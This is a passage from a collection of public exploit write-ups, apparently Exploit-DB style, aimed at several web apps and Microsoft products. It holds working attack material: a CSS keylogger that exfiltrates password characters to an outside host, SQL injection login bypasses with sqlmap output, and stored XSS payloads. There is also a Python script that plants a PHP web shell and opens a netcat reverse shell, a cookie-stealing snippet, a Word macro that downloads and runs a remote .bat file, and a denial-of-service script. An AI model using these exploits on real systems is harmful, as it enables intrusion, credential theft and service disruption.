input[type="password"][value*="B"]{ background-image: url('https://enflownwx6she.x.pipedream.net/B');} input[type="password"][value*="N"]{ background-image: url('https://enflownwx6she.x.pipedream.net/N');} input[type="password"][value*="M"]{ background-image: url('https://enflownwx6she.x.pipedream.net/M');} input[type="password"][value*="1"]{ background-image: url('https://enflownwx6she.x.pipedream.net/1');} input[type="password"][value*="2"]{ background-image: url('https://enflownwx6she.x.pipedream.net/2');} input[type="password"][value*="3"]{ background-image: url('https://enflownwx6she.x.pipedream.net/3');} input[type="password"][value*="4"]{ background-image: url('https://enflownwx6she.x.pipedream.net/4');} input[type="password"][value*="5"]{ background-image: url('https://enflownwx6she.x.pipedream.net/5');} input[type="password"][value*="6"]{ background-image: url('https://enflownwx6she.x.pipedream.net/6');} input[type="password"][value*="7"]{ background-image: url('https://enflownwx6she.x.pipedream.net/7');} input[type="password"][value*="8"]{ background-image: url('https://enflownwx6she.x.pipedream.net/8');} input[type="password"][value*="9"]{ background-image: url('https://enflownwx6she.x.pipedream.net/9');} input[type="password"][value*="0"]{ background-image: url('https://enflownwx6she.x.pipedream.net/0');} input[type="password"][value*="-"]{ background-image: url('https://enflownwx6she.x.pipedream.net/-');} input[type="password"][value*="."]{ background-image: url('https://enflownwx6she.x.pipedream.net/.');} input[type="password"][value*="_"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%60');} input[type="password"][value*="@"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%40');} input[type="password"][value*="?"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3F');} input[type="password"][value*=">"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3E');} input[type="password"][value*="<"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3C');} input[type="password"][value*="="]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3D');} input[type="password"][value*=":"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3A');} input[type="password"][value*=";"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3B');} </style> </head> <body> <label>Please enter username and password</label> <br><br> Password:: <input type="password" /> <script> document.querySelector('input').addEventListener('keyup', (evt)=>{ evt.target.setAttribute('value', evt.target.value); }) </script> </body> </html> ''' 4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url. 5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php) POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1 Host: localhost Content-Length: 160 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg Connection: close url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login 6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com. 7.We write to html files url url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html 8.And create csrf-poc with csrf.poc.generator <html> <title> This CSRF was found by miri </title> <body> <h1> CSRF POC </h1> <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" /> </form> <script>document.forms[0].submit();</script> </body> </html> 9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim. Poc video : https://youtu.be/m-x_rYXTP9E

# Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS) # Date: 30/07/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/car-rental-php-script.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Stored XSS ----------------------------------------------- POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1 payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser. 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser

# Exploit Title: Beauty Salon Management System v1.0 - SQLi # Date of found: 04/07/2023 # Exploit Author: Fatih Nacar # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/> # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/ # CWE: CWE-89 Vulnerability Description - Beauty Salon Management System: V1.0, developed by Campcodes, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate login authentication with the SQL queries and bypass authentication. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. Steps to Reproduce - The following steps outline the exploitation of the SQL Injection vulnerability in Beauty Salon Management System V1.0: 1. Open the admin login page by accessing the URL: http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php 2. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication for usename parameter: {Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In} 3.Execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges. Sqlmap results: POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 793 HTTP(s) requests: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- rvYF&password=test&login=Sign In --- [15:58:56] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.4, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05-07-2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://gilacms.com/ # Software Link: https://github.com/GilaCMS/gila/ # Version: Gila 1.10.9 # Tested on: Linux import requests from termcolor import colored from urllib.parse import urlparse # Print ASCII art ascii_art = """ ██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗ ██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝ ██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ ██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ ╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ by Unknown_Exploit """ print(colored(ascii_art, "green")) # Prompt user for target URL target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ") # Extract domain from target URL parsed_url = urlparse(target_url) domain = parsed_url.netloc target_url_2 = f"http://{domain}/" # Prompt user for login credentials username = input("Enter the email: ") password = input("Enter the password: ") # Create a session and perform login session = requests.Session() login_payload = { 'action': 'login', 'username': username, 'password': password } response = session.post(target_url, data=login_payload) cookie = response.cookies.get_dict() var1 = cookie['PHPSESSID'] var2 = cookie['GSESSIONID'] # Prompt user for local IP and port lhost = input("Enter the local IP (LHOST): ") lport = input("Enter the local port (LPORT): ") # Construct the payload payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f" payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}" # Perform file upload using POST request upload_url = f"{target_url_2}fm/upload" upload_headers = { "Host": domain, "Content-Length": "424", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2", "Accept": "*/*", "Origin": target_url_2, "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}", "Connection": "close" } upload_data = f''' ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7" Content-Type: application/x-php <?php system($_GET["cmd"]);?> ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="path" tmp ------WebKitFormBoundarynKy5BIIJQcZC80i2 Content-Disposition: form-data; name="g_response" content ------WebKitFormBoundarynKy5BIIJQcZC80i2-- ''' upload_response = session.post(upload_url, headers=upload_headers, data=upload_data) if upload_response.status_code == 200: print("File uploaded successfully.") # Execute payload response = session.get(payload_url) print("Payload executed successfully.") else: print("Error uploading the file:", upload_response.text)

## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure ## Author: nu11secur1ty ## Date: 07.06.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415 ## Reference: https://portswigger.net/web-security/information-disclosure, https://www.softwaresecured.com/stride-threat-modeling/ ## CVE-2023-33145 ## Description: The type of information that could be disclosed if an attacker successfully exploited this vulnerability is data inside the targeted website like IDs, tokens, nonces, cookies, IP, User-Agent, and other sensitive information. The user would have to click on a specially crafted URL to be compromised by the attacker. In this example, the attacker use STRIDE Threat Modeling to spoof the victim to click on his website and done. This will be hard to detect. ## Conclusion: Please be careful, for suspicious sites or be careful who sending you an link to open! ## Staus: HIGH Vulnerability [+]Exploit: - Exploit Server: ```js ## This is a Get request from the server when the victims click! And it is enough to understand this vulnerability! =) <script> var i = new Image(); i.src="PoCsess.php?cookie="+escape(document.cookie)</script> ## WARNING: The PoCsess.php will be not uploaded for security reasons! ## BR nu11secur1ty ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html) ## Time spend: 01:30:00

# Exploit Title: Lost and Found Information System v1.0 - SQL Injection # Date: 2023-06-30 # country: Iran # Exploit Author: Amirhossein Bahramizadeh # Category : webapps # Dork : /php-lfis/admin/?page=system_info/contact_information # Tested on: Windows/Linux # CVE : CVE-2023-33592 import requests # URL of the vulnerable component url = "http://example.com/php-lfis/admin/?page=system_info/contact_information" # Injecting a SQL query to exploit the vulnerability payload = "' OR 1=1 -- " # Send the request with the injected payload response = requests.get(url + payload) # Check if the SQL injection was successful if "admin" in response.text: print("SQL injection successful!") else: print("SQL injection failed.")

#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated) #Date: 25 June 2023 #Exploit Author: Okan Kurtulus #Vendor Homepage: https://piwigo.org #Version: 13.7.0 #Tested on: Ubuntu 22.04 #CVE : N/A # Proof of Concept: 1– Install the system through the website and log in with any user authorized to upload photos. 2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded. 3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered. #Payload <sCriPt>alert(1);</sCriPt>

# Exploit Title: Faculty Evaluation System v1.0 - SQL Injection # Date: 07/2023 # Exploit Author: Andrey Stoykov # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip # Version: 1.0 # Tested on: Windows Server 2022 SQLi #1 File: edit_evaluation Line #4 $qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array(); [...] SQLi #2 File: view_faculty.php Line #4 // Add "id" parameter after "view_faculty" parameter then add equals "id" with integer [...] $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array(); [...] Steps to Exploit: 1. Login to application 2. Browse to following URI "http://host/eval/index.php?page=view_faculty&id=1" 3. Copy request to intercept proxy to file 4. Exploit using SQLMap sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint [...] [INFO] testing MySQL [INFO] confirming MySQL [INFO] the back-end DBMS is MySQL [INFO] actively fingerprinting MySQL [INFO] executing MySQL comment injection fingerprint back-end DBMS: active fingerprint: MySQL >= 5.7 comment injection fingerprint: MySQL 5.6.49 fork fingerprint: MariaDB [...]

## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution ## Author: nu11secur1ty ## Date: 07.07.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://outlook.live.com/owa/ ## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/ ## CVE-2023-33131 ## Description: In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content to everyone who using the Outlook app, no matter web or local. Microsoft still doesn't have a patch against this 0-day vulnerability today. ## Staus: HIGH Vulnerability [+]Exploit: - The malicious Word file: ```js Sub AutoOpen() Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus) End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html) ## Time spend: 00:30:00

## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution ## Author: nu11secur1ty ## Date: 01.14.2022 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264 ## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907 ## CVE-2022-21907 ## Description: NOTE: After a couple of hours of tests and experiments, I found that there have been no vulnerabilities, this is just a ridiculous experiment of Microsoft. When I decided to install the IIS packages on these Windows platforms, everything was ok, and everything is patched! Windows Server 2019, Windows 10 version 1809 - 2018 year are not vulnerable by default, but after I decided to upgrade from 1909 to 2004. I found a serious problem! The Windows 10 version 2004 - 2020 year is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack method: buffer overflow - deny of service and restart the system. This problem exists, from last year which is reported on CVE-2021-31166, and still there! On that days I have worked on it again with the help and collaboration of Axel Souchet 0vercl0k the author of the idea. On that day, I wrote an only one-line command to exploit this vulnerability! [+]Exploit: ```python #!/usr/bin/python # Author @nu11secur1ty # CVE-2022-21907 from colorama import init, Fore, Back, Style init(convert=True) import requests import time print(Fore.RED +"Please input your host...\n") print(Style.RESET_ALL) print(Fore.YELLOW) host = input() print(Style.RESET_ALL) print(Fore.BLUE +"Sending of especially malicious crafted packages, please wait...") print(Style.RESET_ALL) time.sleep(17) print(Fore.GREEN) # The PoC :) poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA,\ BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\ RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\ TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\ OOOAOAOOOAOOAOOOAOOOAOOOAOO,\ ****************************stupiD, *, ,',}) # Not necessary :) print(poc,"\n") print(Style.RESET_ALL) ``` ## Reproduce: [href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907) ## Proof and Exploit [href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html) ## Time spend: 05:30:00

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS) # Exploit Author: tmrswrr # Vendor Homepage: https://decapcms.org/docs/intro/ # Software Link: https://github.com/decaporg/decap-cms # Version: 2.10.192 # Tested on: https://cms-demo.netlify.com Description: 1. Go to new post and write body field your payload: https://cms-demo.netlify.com/#/collections/posts Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe> 2. After save it XSS payload will executed and see alert box